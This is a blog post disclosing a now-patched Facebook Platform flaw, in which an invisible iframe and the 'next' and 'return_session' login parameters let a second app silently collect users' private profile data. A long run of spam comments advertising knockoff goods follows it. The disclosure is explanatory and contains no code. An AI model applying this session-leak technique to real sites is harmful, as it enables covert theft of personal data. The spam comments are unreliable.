Posted by theharmonyguy in Facebook | 199 comments
Facebook Platform Vulnerability Enabled Silent Data Harvesting
A few weeks ago, I sent Facebook a demonstration of what appeared to be a previously unknown attack combining two behaviors of the Facebook Platform. The technique allowed one to create a seemingly innocent web page that would invisibly and silently steal a visitor’s private Facebook content. Facebook has now disabled the attack by modifying one of the exploited behaviors.
It’s unlikely that any real-world attacks used this particular vulnerability, and I certainly have no record of such a case. But it’s also unclear how long the problem has existed. I discovered one part of the technique, a “return_session” parameter for application authorization, while examining the behavior of the Yahoo! contact importer, which only launched a month ago. However, discussions on Facebook’s developer forum mention the parameter in the context of Facebook Connect implementations as far back as February 2009. The other main component, now modified by Facebook, may have existed since the beginning of the Platform in 2007.
In my proof-of-concept demonstration, I loaded a harmless-looking web page on a server external to Facebook. The page included code for an inline frame sized to be invisible to the user. This frame then loaded the login page for a Facebook application. If the user has already authorized an application, its login page will automatically forward to the application, and that’s exactly what I wanted to happen. I chose FarmVille for my demo, since it has a wide install base. Keep in mind that while FarmVille currently lists about 83 million monthly active users, the attack would have worked for anyone who has authorized the application, regardless of how long ago. The attack could also target multiple applications at once using multiple iframes, meaning nearly any of Facebook’s 400 million active users could have fallen prey.
But the first main component of the attack involved a slight modification to the login page URI. By adding a “next” parameter, one can specify an alternate landing page for authorized users. Not all applications take advantage of this parameter, but many do. The parameter would not work for an arbitrary site, but Facebook previously did allow any URI that began with apps.facebook.com. Thus one could craft a login page URI that checked whether the user had authorized one application and then forward the user to a second application.
The next part of the attack came from adding “return_session=1″ to the login page URI. This parameter causes Facebook to append particular session variables for the authorized application onto the URI of the landing page – in our case, the second application given by the “next” parameter. That application merely has to check its address for the session data, which provides enough information to execute API requests using the credentials of the already authorized application. Since an authorized application essentially operates on behalf of a user, it has access to nearly all private profile information (essentially, everything but your e-mail address and phone number) and content (photos, links, notes, etc.) that can be loaded via the API, and hence the second application had such access as well. This entire process could be fully automated without any user interaction and did not require any authorization for the second application. Also, the attack could generally be executed quick enough to avoid Facebook’s measures for detecting when their pages are loaded in frames.
To patch the attack, Facebook has restricted the “next” parameter; it now only forwards to addresses for the application specified on the login page, preventing any appended session data from reaching the wrong destination. Since an authorized application already has API access, using return_session with that application will not add any new privileges.
I commend Facebook for responding quickly to this issue and for being open to white-hat security reports. But in my opinion, this vulnerability is simply the latest reminder that the Facebook Platform can open users to many problems quite separate from the security of Facebook itself. I personally think that aspects of the Platform’s implementation fail to match user expectations of privacy, as I’ve discussed previously. And while this particular problem may be solved, vulnerabilities in specific applications and the nature of application access continue to put private data at risk of unwanted disclosure.
Writing is exceptional, I like your article that fresh soul, you read the article more attractive.
That is very good comment you shared.Thank you so much that for you shared those things with us.Im wishing you to carry on with ur achivments.All the best.
It’s hard to find experienced people about this topic, however you seem like you understand just what you’re referring to! Thanks a lot
Cheap North Face
North Face Coat
North Face Sale
Facebook is very great to use, but there are some problems inside.
very strong r4 card, welcome to buy.
I like this post very much. please write more and more about this. very useful and interesting.
http://www.buy-shoes-bag.com
http://www.wholesalecheapsunglasses.com
Very good r4 card, maybe you will interesting, I like your post very much, very useful. I just stumbled upon your informative blog and wanted to say that I have really enjoyed reading your very well written blog posts.
http://www.cnbrandstore.com
It sells the continuing tobacco to consumers at a price that takes the state tobacco tax into account,” the claim states.
I was glad I happen to stop by on your blog. My research is almost done, thanks for sharing this.
In the era of leather and sheepskin is so common, can not meet all the needs of women
It’s actually a great and helpful piece of information. I am happy that you shared this helpful information with us. Please stay us informed like this. Thank you for sharing.
its a realy good post…
Wow, Private lives exposed wide open
come here thank you~
This is really nice blog, I am very impressed.
Very good r4 card, maybe you will interesting, I like your post very much, very useful. I just stumbled upon your informative blog and wanted to say that I have really enjoyed reading your very well written blog posts.freetress
THIS IS A GOOD ARTICLE
Very useful stuff in here…..
nfl 2009-Pro-Bowl jerseys
t rather easy for spammers to gain access to my feed and spam my social network. Or how about …
I like your article.Fashion is a forever topic. Everyone loves beautiful things and wants to be beautiful or handsom Thank you for sharing your stories, your opinions, your thoughts and your life. Top quality products will help you. Maybe you can have a look at my website. http://www.super-discount-sneakers.com/
Nice post.Thank you for taking the time to publish this information very useful!I’m still waiting for some interesting thoughts from your side in your next post thanks!
UGG Bailey Button Triplet
The conflict-of-interest case involves a former general counsel of the Securities and Exchange Commission, who had financial ties through his family to an account with Bernie Madoff.
thanks for your sharing. I will necessarily add it in the selected works and I will visit this site.
I’m like you write something, really very good!
As British designer brand Burberry started their spring/summer chi hair products
url=http://www.chiflatironus.net/]chi flat irons[/url]
2012 fashion show today,
the first people to see each look was not the fashion editors in the front row,
but Burberry’s very own Twitter followers all over the world as Burberry was the first brand to stream a ‘tweetwalk’.
I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work!
“You don’t deliver a Cheap Shoes Online, you don’t deliver another quarter, then you make some important announcements that are communicated poorly — it was incremental,” Lane said on a conference call. Whitman was on the call, but Apotheker was not. “Then you have to make the tough call of, how long do you go along with that? Do you help? Do you surround? Or do you replace?”
werwerarewraew
Great videos! Thank you!!
Arizona-Cardinals jerseys wholesale http://www.2011jerseysstore.com
Creative blog is very interesting moncler coats and jackets Is a very good Web site monclers is on cheap moncler jackets yes canadian goose This is I very much agree with goose canada is moncler shoes I believe that bloggers would agree!
Microsoft Windows 8 aura un bureau unifié et des systèmes mobiles pour les deux plateformes, peuvent donner aux consommateurs une expérience d’exploitation plus unifiée.
The entire ugg australia boots packaging process is paid into detail to enhance the collections quality and appearance. This ensures that the uggs australia uk is properly safeguard from harsh weather conditions so that the buyer gets it when it’s as new as it ought to be. australia ugg boots are usually packaged in cartons and smaller boxes which are beautifully decorated with artwork and carrying the company label. Other than flaunting cheap Ugg Boots, the reason behind this is to make the collections customer friendly. This applies the most when shipping has to be done and the type of salvatore ferragamo shoes packaging is used to determine the packaging cost. High quality packaging of ferragamo shoes, watches, earrings and other help protect them from getting dust or moisture from the environment. When people see a buyer carrying a bag with the ferragamo outlet of the company, they will definitely get attracted and pulled towards with an urge to get the same. ferragamo shoes sale also enhances flexibility in transport. If the ferragamo sale has a good shape, it will be much manageable to transport and distribute. This is highly paid much to details because the cheap Ugg Boots company has stores all over the world and a slight mistake can end up destroying the whole collection. ugg boot sale packaging is of great importance. It cuts down on the risks that would otherwise have been encountered had the collections got broken or damaged. In today’s world, nothing without a uk ugg boots sale package has the ability to sell including an eraser. Simple though very important thing to consider is that the ugg boots on sale package is not only aimed at preserving, but to get the attention of the target market. If the cheap boots package is all rugged and out of shape, regardless of how much of a treasure the inside is, no one will be interested. Some of these ugg boots cheap will come with the product for free but if high quality package has to be done like in wholesale, the buyer has to compensate for the extra packaging. It seems that among the consistently hottest sellers from this Ugg Boots sale line is the Highrise. Within this discount uggs lineup can be found a patent version (or two) which all have a great, eye-catching look.
http://www.uggsalecheapau.org
This really answered my problem, thank you!… I think happy should be shared for everyone. I adore your site very much.
I just read about this in the paper! It contains wonderful and helpful posts. How I wish I’d known about this blog before. I would have loved to have worked on this project! What a great accomplishment. Beautiful. Congratulations to you.Thanks for your information!It is a good post i think!
Discount Ugg Boots,Ugg Boots Outlet,Discount Uggs Boots,Uggs Boots Outlet,Uggs Online
I like the style of your writting.
well this blog is great i love reading your articles.
Microsoft Windows 8 aura un bureau unifié et des systèmes mobiles pour les deux plateformes,peuvent donner aux consommateurs une expérience d’exploitation plus unifiée.
This is really nice blog,s
I am very impressed.
I’m like you write something, really very good!
Wow!I really loved reading your blog. It was very well written and simple to understand. Unlike additional blogs I have read.
This is a great one..nice article, thanks for share with
us… I learn a lot with your words.. thank for the post.
If you want to see the mind blowing article with real facts and figures, this has really tremendous impacts on readers and I admire the writing skill of the author.
Simple fashion sale shoes, with the curve of your legs
Coming in 2012, set aside the choice of a 2011 bored best demonstrate your personality fashion sale shoes to your stylish outfit, so you stunning appearance. In the New Year’s dress, no matter what shape are missing not one pair of wholesale cheap shoes to help you the finishing touch. Whether it is the high-heeled boots or simple style highlight your fashion sense of the fish head shoes. Carefully selected for your local high-profile sale shoes bring out your beautiful legs curve.
High-heeled boots for your fashion trend with a lot of sense to add on Oh! The complex style of costume-wholesale cheap shoes with high heels fashion can not too much decoration, good shoes to wear on their feet as long as even the ugly duckling into a swan would.
Leopard temptation, this style of wholesale cheap shoes high heels with one designed to make you more comfortable wearing them. Dinner at your choice of dress in a dress will let you add on a lot of attention with the eyes!
Fish head shoes, high heels, their hairy edge style design style highlights a sense of luxury fashion. Like three-dimensional sense of women, this can be a choice of high-heeled boots, ankle position changes along the length of walking sound of sound!
Thank you for you article.It’s very useful to me!
I love this article.Thank you for sharing!
Thanks for sharing these informations. Glad that I found it with the help of the link that you’ve shared. I will come again.
Comme une conceptrice montée à Londres, Jenny Packham a gagné un prix la conceptrice qui est le meilleur en Angleterre. En 2010,Jenny Packham a gagné un prix British Export Award. Jusqu’à aujourd’hui,la route de la marque Jenny Packham rencontre un grand succès. Elle a gagné beaucoup de yeux dans le monde. On peut voir ses oeuvres souvent dans les parties,la robe de cocktail 2011,la robe de soirée pour mariage etc. Beaucoup de gens le choisit pour une robe de mariage dans la cérémonie de mariage.
I just read about this in the paper! It contains wonderful and helpful posts
By adding a “next” parameter, one can specify an alternate landing page for authorized users. Not all applications take advantage of this paramete
OK really very good!